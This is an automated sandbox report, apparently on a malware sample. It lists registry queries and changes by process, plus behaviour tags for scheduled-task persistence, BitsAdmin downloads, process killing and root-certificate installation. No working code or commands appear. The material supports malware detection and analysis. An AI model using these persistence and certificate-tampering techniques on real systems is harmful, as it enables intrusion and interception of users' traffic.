Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	any.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	configbdzhzl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	configbdzhzl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	any.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5464 schtasks.exe
7084 schtasks.exe
4624 schtasks.exe
6156 schtasks.exe
5304 schtasks.exe
3712 schtasks.exe
Download via BitsAdmin 1 TTPs 2 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exe

pid process

5664 bitsadmin.exe
6432 bitsadmin.exe

pid	process
5464	schtasks.exe
7084	schtasks.exe
4624	schtasks.exe
6156	schtasks.exe
5304	schtasks.exe
3712	schtasks.exe

pid	process
5664	bitsadmin.exe
6432	bitsadmin.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

System Information Discovery

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWINWORD.EXEWerFault.exeWerFault.exeany.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exePOWERPNT.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execonfigbdzhzl.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exehkAZQUdE7y720uA2jdtj5skU.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	any.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	any.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	configbdzhzl.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	hkAZQUdE7y720uA2jdtj5skU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4364 taskkill.exe
6012 taskkill.exe
5196 taskkill.exe
6644 taskkill.exe
1552 taskkill.exe
5700 taskkill.exe
5432 taskkill.exe
772 taskkill.exe

pid	process
4364	taskkill.exe
6012	taskkill.exe
5196	taskkill.exe
6644	taskkill.exe
1552	taskkill.exe
5700	taskkill.exe
5432	taskkill.exe
772	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

Processes:

msiexec.exeExplorer.EXE

description	ioc	process
Key created	\Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	Explorer.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

DrvInst.exemsiexec.exemask_svc.exesvchost.exesvchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02lrqqzjiojuqmiq\DeviceId = "<Data LastUpdatedTime=\"1626948653\"><User username=\"02LRQQZJIOJUQMIQ\"><HardwareInfo BoundTime=\"1626948652\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"156\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordLength = "8"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	DrvInst.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	DrvInst.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ProviderPasswordCharacterGroups = "2"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption"	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	mask_svc.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\WnfLastTimeStamps\WNF_LIC_HARDWAREID_IN_DEVICE_LICENSE_IN_TOLERANCE = "1636062494"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	DrvInst.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.Default\Software\Microsoft\IdentityCRL\WnfLastTimeStamps	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	DrvInst.exe

Modifies registry class 13 IoCs

Processes:

Explorer.EXEvpn.tmpCalculator.exeSettings.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node	vpn.tmp
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}"	vpn.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{7CF6631E-6809-4839-9907-43BC312765E5}	Calculator.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{D5066D1F-9390-4201-834C-1CCAED000709}	Settings.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

installer.exeinstaller.exevpn.tmp

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d